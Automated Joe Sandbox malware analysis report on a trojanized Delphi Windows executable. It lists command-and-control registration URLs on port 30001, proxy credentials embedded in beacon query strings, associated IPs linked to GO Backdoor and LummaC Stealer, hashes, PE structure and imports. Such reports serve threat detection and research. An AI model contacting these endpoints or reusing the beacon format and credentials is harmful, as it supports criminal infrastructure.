http://147.45.196.157:30001/api/helper-first-register185.121.233.152;14887;hQUatmqOtRaIpGdc:Gtx/0zT/ | 0% | Avira URL Cloud | safe
http://HTTP/1.1X-Api-KeyGAlbhK5Hhttp/1.1http/1.1HTTP_PROXY | 0% | Avira URL Cloud | safe
http://46.8.232.106:30001/api/helper-first-register?buildVersion=0z76.pdO2CqG&md5=2e82e1c508af8197f9a033822e9d742f&proxyPassword=3ijnTpLW&proxyUsername=4dUZxibc&userId=gyQqwSb2enJmg2j1kyuweSXakKqafLse | 0% | Avira URL Cloud | safe
http://91.212.166.91:30001/api/helper-first-register | 0% | Avira URL Cloud | safe
http://46.8.232.106:30001/api/helper-first-register? | 0% | Avira URL Cloud | safe
http://www.picget.net/photoshine-photo-editor/buy.html | 0% | Avira URL Cloud | safe
http://46.8.232.106:30001 | 0% | Avira URL Cloud | safe
http://91.212.166.9:30001/api/helper-first-register | 0% | Avira URL Cloud | safe
http://46.8.232.106:30001/api/helper-first-register | 0% | Avira URL Cloud | safe
http://www.picget.net | 0% | Avira URL Cloud | safe
http://46.8.232.106:30001GAlbhK5HREQUEST_METHODGo-http-client/1.1 | 0% | Avira URL Cloud | safe
http://46.8.232.106:30001/api/helper-first-register?abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUV | 0% | Avira URL Cloud | safe
http://147.45.196.157:30001/api/helper-first-register2025/02/11 | 0% | Avira URL Cloud | safe
http://147.45.196.157:30001/api/helper-first-register | 100% | Avira URL Cloud | malware
http://46.8.232.106:30001/api/helper-first-register?buildVersion=0z76.pdO2CqG&md5=2e82e1c508af8197f9 | 0% | Avira URL Cloud | safe
http://46.8.236.61:30001/api/helper-first-register | 0% | Avira URL Cloud | safe


        No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://46.8.232.106:30001/api/helper-first-register?buildVersion=0z76.pdO2CqG&md5=2e82e1c508af8197f9a033822e9d742f&proxyPassword=3ijnTpLW&proxyUsername=4dUZxibc&userId=gyQqwSb2enJmg2j1kyuweSXakKqafLse | true | Avira URL Cloud: safe | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
http://147.45.196.157:30001/api/helper-first-register185.121.233.152;14887;hQUatmqOtRaIpGdc:Gtx/0zT/ | SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2580290752.000000000C864000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.picget.net/photoshine-photo-editor/buy.html | SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe | false | Avira URL Cloud: safe | unknown
http://91.212.166.91:30001/api/helper-first-register | SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2581726494.000000000C92A000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://46.8.232.106:30001/api/helper-first-register? | SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2580290752.000000000C80E000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://91.212.166.9:30001/api/helper-first-register | SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2581726494.000000000C92A000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://46.8.232.106:30001/api/helper-first-register | SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2581726494.000000000C92A000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://HTTP/1.1X-Api-KeyGAlbhK5Hhttp/1.1http/1.1HTTP_PROXY | SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2580290752.000000000C854000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://46.8.232.106:30001 | SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2580290752.000000000C85C000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.picget.net | SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe | false | Avira URL Cloud: safe | unknown
http://46.8.232.106:30001GAlbhK5HREQUEST_METHODGo-http-client/1.1 | SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2580290752.000000000C85C000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://147.45.196.157:30001/api/helper-first-register | SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2581726494.000000000C92A000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://147.45.196.157:30001/api/helper-first-register2025/02/11 | SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2581726494.000000000C92A000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://46.8.232.106:30001/api/helper-first-register?buildVersion=0z76.pdO2CqG&md5=2e82e1c508af8197f9 | SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2580290752.000000000C84E000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://46.8.232.106:30001/api/helper-first-register?abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUV | SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2580290752.000000000C80E000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://46.8.236.61:30001/api/helper-first-register | SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2581726494.000000000C92A000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
46.8.232.106 | unknown | Russian Federation | 28917 | FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | true
185.121.233.152 | unknown | Spain | 198432 | IPCORE-ASES | true
        Joe Sandbox version:42.0.0 Malachite
        Analysis ID:1611944
        Start date and time:2025-02-11 10:54:02 +01:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 4m 51s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:15
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe
        Detection:MAL
        Classification:mal92.troj.evad.winEXE@5/1@0/2
        EGA Information:
        • Successful, ratio: 100%
        HCA Information:
        • Successful, ratio: 64%
        • Number of executed functions: 1
        • Number of non-executed functions: 18
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
        • Excluded IPs from analysis (whitelisted): 13.107.246.45, 172.202.163.200
        • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
        No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
46.8.232.106 | https://nopaste.net/gFFvm8SLzB | malicious | GO Backdoor, LummaC Stealer | 46.8.232.106/
46.8.232.106 | TEG0KQGWMBA1JEEN9AI3O7.exe | malicious | GO Backdoor | 46.8.232.106/
46.8.232.106 | TEG0KQGWMBA1JEEN9AI3O7.exe | malicious | GO Backdoor | 46.8.232.106/
46.8.232.106 | gFFvm8SLzB.ps1 | malicious | LummaC Stealer | 46.8.232.106/
46.8.232.106 | 31gmoyUfdI.ps1 | malicious | LummaC Stealer | 46.8.232.106/
46.8.232.106 | 5N0WWuwk3d.ps1 | malicious | GO Backdoor, LummaC Stealer | 46.8.232.106/
46.8.232.106 | europe.exe | malicious | LummaC, GO Backdoor, LummaC Stealer | 46.8.232.106/
46.8.232.106 | nuI7Op1TKn.exe | malicious | GO Backdoor | 46.8.232.106/
46.8.232.106 | nuI7Op1TKn.exe | malicious | GO Backdoor | 46.8.232.106/
46.8.232.106 | dYkofBsuAX.exe | malicious | GO Backdoor | 46.8.232.106:30001/api/helper-first-register?buildVersion=0fpl.CnD2c8j&md5=889b99c52a60dd49227c5e485a016679&proxyPassword=2FUHyaZe&proxyUsername=MW4ljsAD&userId=MqUtaT2GmvCEuFsJrzrGaZuY
185.121.233.152 | 31gmoyUfdI.ps1 | malicious | LummaC Stealer |
185.121.233.152 | europe.exe | malicious | LummaC, GO Backdoor, LummaC Stealer |
185.121.233.152 | Adlice Software.exe | malicious | GO Backdoor |
185.121.233.152 | reduce.exe | malicious | GO Backdoor |
185.121.233.152 | m0Yc9KltGw.exe | malicious | GO Backdoor |
No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | https://nopaste.net/gFFvm8SLzB | malicious | GO Backdoor, LummaC Stealer | 46.8.232.106
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | TEG0KQGWMBA1JEEN9AI3O7.exe | malicious | GO Backdoor | 46.8.236.61
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | TEG0KQGWMBA1JEEN9AI3O7.exe | malicious | GO Backdoor | 46.8.232.106
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | gFFvm8SLzB.ps1 | malicious | LummaC Stealer | 46.8.236.61
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | 31gmoyUfdI.ps1 | malicious | LummaC Stealer | 46.8.232.106
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | 5N0WWuwk3d.ps1 | malicious | GO Backdoor, LummaC Stealer | 46.8.232.106
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | europe.exe | malicious | LummaC, GO Backdoor, LummaC Stealer | 46.8.232.106
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | nuI7Op1TKn.exe | malicious | GO Backdoor | 46.8.232.106
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | nuI7Op1TKn.exe | malicious | GO Backdoor | 46.8.236.61
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | dYkofBsuAX.exe | malicious | GO Backdoor | 46.8.236.61
IPCORE-ASES | 31gmoyUfdI.ps1 | malicious | LummaC Stealer | 185.121.233.152
IPCORE-ASES | europe.exe | malicious | LummaC, GO Backdoor, LummaC Stealer | 185.121.233.152
IPCORE-ASES | Adlice Software.exe | malicious | GO Backdoor | 185.121.233.152
IPCORE-ASES | http://www.schoolhouselearningcenter.net/ | malicious | Unknown | 185.121.235.167
IPCORE-ASES | http://petruccilaw.com/ | malicious | Unknown | 185.121.235.167
IPCORE-ASES | http://www.lpb.gov.lr | malicious | CAPTCHA Scam ClickFix | 185.121.235.167
IPCORE-ASES | over.ps1 | malicious | Vidar | 185.121.235.167
IPCORE-ASES | https://www.tblgroup.com/tbl2/certificados-digitales/ | malicious | CAPTCHA Scam ClickFix | 185.121.235.167
IPCORE-ASES | reduce.exe | malicious | GO Backdoor | 185.121.233.152
IPCORE-ASES | m0Yc9KltGw.exe | malicious | GO Backdoor | 185.121.233.152
                  No context
                  No context
                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1044
                  Entropy (8bit):6.345324725430294
                  Encrypted:false
                  SSDEEP:24:hpOmfEvZmGVA20Rx4udgRBabTPYjAeuoVs0EvrpCq:7Om5GVA9PwBCO0f4q
                  MD5:07DDB733765B7E0F203CFDE51BFA0A18
                  SHA1:8D45438B869D4DDA70527AA93E06420432AD3952
                  SHA-256:D8898D306A320BD6A3384DF95F76B91E4980B9F7EDCDD949983B67FA6E0DA252
                  SHA-512:5012B08F0767AD148A195E8FBE26859A6CADAEB4381E892B3ED279CA025AC86BFED6D5A5566F897E33DE08B105EEAA831F30C05D9DA82205FA2F0C7001E51796
                  Malicious:false
                  Reputation:low
                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):7.656380007565565
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.37%
                  • InstallShield setup (43055/19) 0.43%
                  • Win32 Executable Delphi generic (14689/80) 0.15%
                  • Win16/32 Executable Delphi generic (2074/23) 0.02%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  File name:SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe
                  File size:6'808'576 bytes
                  MD5:2e82e1c508af8197f9a033822e9d742f
                  SHA1:810bb59a46ef0ab3e164f4d45b2334d0f5af9e04
                  SHA256:50a606e258eabb822fe0b64ce17d91fcc17b1f4465aa874c2f3f1ff51fb3a956
                  SHA512:b1e33ab51f1fa0dee52799cee36ffe4e910d496e9f627e71e55aa9e06146ea95d1754e3f865972536e11bccb87fc994008e3861ede94e95390e38682ec3ab3fd
                  SSDEEP:98304:jGQ5LbtL0Q3ke/Yyiki2ODxc3ZtQNvBosQEdVXZv2bTjqVih/o:jnLbCYkVyjdODGJCbosQEdxe/o
                  TLSH:32664AC1AE539A02D796E2F9B1A12B61A1E6DC03D040C45371CEFD4C4BFA39E56B3B46
                  File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                  Icon Hash:130b030705070b97
                  Entrypoint:0x4c5d30
                  Entrypoint Section:CODE
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                  DLL Characteristics:DYNAMIC_BASE
                  Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:12162a611fb2169f101a204969fe495d
Entrypoint instructions:
push ebp
mov ebp, esp
add esp, FFFFFFF0h
mov eax, 004C5AA8h
call 00007F5D2C62A019h
mov eax, dword ptr [007DA1B8h]
mov eax, dword ptr [eax]
call 00007F5D2C6883DDh
mov ecx, dword ptr [007D9FD4h]
mov eax, dword ptr [007DA1B8h]
mov eax, dword ptr [eax]
mov edx, dword ptr [004BEA80h]
call 00007F5D2C6883DDh
mov ecx, dword ptr [007DA278h]
mov eax, dword ptr [007DA1B8h]
mov eax, dword ptr [eax]
mov edx, dword ptr [004B66F4h]
call 00007F5D2C6883C5h
mov ecx, dword ptr [007DA01Ch]
mov eax, dword ptr [007DA1B8h]
mov eax, dword ptr [eax]
mov edx, dword ptr [004B6498h]
call 00007F5D2C6883ADh
mov eax, dword ptr [007DA1B8h]
mov eax, dword ptr [eax]
call 00007F5D2C688421h
call 00007F5D2C627A80h
lea eax, dword ptr [eax+00h]
add byte ptr [eax], al (this line is repeated 40 times in the listing: zero bytes following the entry routine, disassembled as instructions)
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3de000 | 0x269e | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3f0000 | 0x295e38 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x3e3000 | 0xc0fc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x3e2000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
CODE | 0x1000 | 0x3d6da8 | 0x3d6e00 | ecced6aea8a733a4a1fcf030a1def2c2 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA | 0x3d8000 | 0x237c | 0x2400 | 35f406e3381155c89a5edf6f76370e38 | False | 0.4391276041666667 | data | 4.505443714844566 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS | 0x3db000 | 0x2539 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x3de000 | 0x269e | 0x2800 | 2958723e58b41fd82a37c7d52b2e382e | False | 0.35771484375 | data | 4.964278995708769 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x3e1000 | 0x10 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x3e2000 | 0x18 | 0x200 | 4b630e3f6f27e175377ada9d376c0405 | False | 0.05078125 | MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "~" | 0.1991075177871819 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc | 0x3e3000 | 0xc0fc | 0xc200 | 5573c821ff9e2229523713805246064c | False | 0.5588555090206185 | data | 6.654312615642515 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc | 0x3f0000 | 0x376000 | 0x296000 | 08ba4846e95360ea792534aa73123308 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
ogmsrn | 0x766000 | 0x1053 | 0x200 | 06deaf729129660e4e05c5f63364d2ce | False | 1.021484375 | data | 7.589688260136585 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x3f0e9c | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | | | 0.38636363636363635
RT_CURSOR | 0x3f0fd0 | 0x134 | data | | | 0.4642857142857143
RT_CURSOR | 0x3f1104 | 0x134 | data | | | 0.4805194805194805
RT_CURSOR | 0x3f1238 | 0x134 | data | | | 0.38311688311688313
RT_CURSOR | 0x3f136c | 0x134 | data | | | 0.36038961038961037
RT_CURSOR | 0x3f14a0 | 0x134 | data | | | 0.4090909090909091
RT_CURSOR | 0x3f15d4 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | | | 0.4967532467532468
RT_BITMAP | 0x3f1708 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.43103448275862066
RT_BITMAP | 0x3f18d8 | 0x1e4 | Device independent bitmap graphic, 36 x 19 x 4, image size 380 | | | 0.46487603305785125
RT_BITMAP | 0x3f1abc | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.43103448275862066
RT_BITMAP | 0x3f1c8c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.39870689655172414
RT_BITMAP | 0x3f1e5c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.4245689655172414
RT_BITMAP | 0x3f202c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.5021551724137931
RT_BITMAP | 0x3f21fc | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.5064655172413793
RT_BITMAP | 0x3f23cc | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.39655172413793105
RT_BITMAP | 0x3f259c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.5344827586206896
RT_BITMAP | 0x3f276c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.39655172413793105
RT_BITMAP | 0x3f293c | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | | | 0.4870689655172414
RT_BITMAP | 0x3f2a24 | 0x228 | Device independent bitmap graphic, 28 x 28 x 4, image size 448 | English | United States | 0.2536231884057971
RT_BITMAP | 0x3f2c4c | 0x268 | Device independent bitmap graphic, 32 x 32 x 4, image size 512 | Russian | Russia | 0.3181818181818182
RT_BITMAP | 0x3f2eb4 | 0x66a | Device independent bitmap graphic, 24 x 24 x 8, image size 1642, resolution 2834 x 2834 px/m | | | 0.8873325213154689
RT_ICON | 0x3f3520 | 0x1f91 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.967949511199109
RT_ICON | 0x3f54b4 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 0 | | | 0.05487696675736425
RT_ICON | 0x405cdc | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 0 | | | 0.07399621610258567
RT_ICON | 0x40f184 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 0 | | | 0.125
RT_ICON | 0x4133ac | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | | | 0.17147302904564315
RT_ICON | 0x415954 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | | | 0.28588180112570355
RT_ICON | 0x4169fc | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | | | 0.4081967213114754
RT_ICON | 0x417384 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | | | 0.6054964539007093
RT_DIALOG | 0x4177ec | 0x52 | data | | | 0.7682926829268293
RT_STRING | 0x417840 | 0x198 | data | | | 0.5147058823529411
RT_STRING | 0x4179d8 | 0x3b4 | data | | | 0.3575949367088608
RT_STRING | 0x417d8c | 0x3b8 | data | | | 0.42436974789915966
RT_STRING | 0x418144 | 0x1f8 | data | | | 0.5277777777777778
RT_STRING | 0x41833c | 0xe8 | data | | | 0.5905172413793104
RT_STRING | 0x418424 | 0x128 | data | | | 0.5574324324324325
RT_STRING | 0x41854c | 0x2e0 | data | | | 0.4320652173913043
RT_STRING | 0x41882c | 0x40c | data | | | 0.37741312741312744
RT_STRING | 0x418c38 | 0x398 | data | | | 0.3804347826086957
RT_STRING | 0x418fd0 | 0x3ac | data | | | 0.35212765957446807
RT_STRING | 0x41937c | 0x3bc | data | | | 0.3985355648535565
RT_STRING | 0x419738 | 0xf4 | data | | | 0.47540983606557374
RT_STRING | 0x41982c | 0xc4 | data | | | 0.5663265306122449
RT_STRING | 0x4198f0 | 0x2e0 | data | | | 0.44429347826086957
RT_STRING | 0x419bd0 | 0x35c | data | | | 0.40813953488372096
RT_STRING | 0x419f2c | 0x2b4 | data | | | 0.4060693641618497
RT_RCDATA | 0x41a1e0 | 0x10 | data | | | 1.5
RT_RCDATA | 0x41a1f0 | 0x38c | data | | | 0.6850220264317181
RT_RCDATA | 0x41a57c | 0x1015c | Delphi compiled form 'TFormAdjust' | | | 0.20882156517515635
RT_RCDATA | 0x42a6d8 | 0x4cd4f | Delphi compiled form 'TFormChangjingAdjust' | | | 0.2264452515546404
RT_RCDATA | 0x477428 | 0x1f4d19 | Delphi compiled form 'TFormMain' | | | 0.20725727081298828
RT_RCDATA | 0x66c144 | 0x22d | Delphi compiled form 'TFormProcessing' | | | 0.6086175942549371
RT_RCDATA | 0x66c374 | 0xdfd1 | Delphi compiled form 'TFormRegister' | | | 0.312930868980924
RT_RCDATA | 0x67a348 | 0xb6dd | Delphi compiled form 'TFormResize' | | | 0.26986093606476835
RT_GROUP_CURSOR | 0x685a28 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.25
RT_GROUP_CURSOR | 0x685a3c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.25
RT_GROUP_CURSOR | 0x685a50 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_CURSOR | 0x685a64 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_CURSOR | 0x685a78 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_CURSOR | 0x685a8c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_CURSOR | 0x685aa0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_ICON | 0x685ab4 | 0x76 | data | | | 0.7711864406779662
RT_VERSION | 0x685b2c | 0x30c | data | English | United States | 0.44743589743589746
DLL | Import
kernel32.dll | DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
user32.dll | GetKeyboardType, LoadStringA, MessageBoxA, CharNextA
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
kernel32.dll | lstrcpyA, lstrcmpA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetFileAttributesA, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProfileStringA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFileAttributesA, GetDriveTypeA, GetDiskFreeSpaceA, GetCurrentThreadId, GetCurrentProcessId, GetComputerNameA, GetCPInfo, GetACP, FreeResource, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateMutexA, CreateFileA, CreateEventA, CreateDirectoryA, CompareStringA, CloseHandle
version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
gdi32.dll | UnrealizeObject, StretchBlt, StartPage, StartDocA, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetMapMode, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SetAbortProc, SelectPalette, SelectObject, SaveDC, RoundRect, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, Polygon, PlayEnhMetaFile, PathToRegion, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetViewportOrgEx, GetTextMetricsA, GetTextExtentPointA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExtTextOutA, ExcludeClipRect, EndPath, EndPage, EndDoc, Ellipse, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateICA, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateDCA, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, CombineRgn, CloseFigure, BitBlt, BeginPath
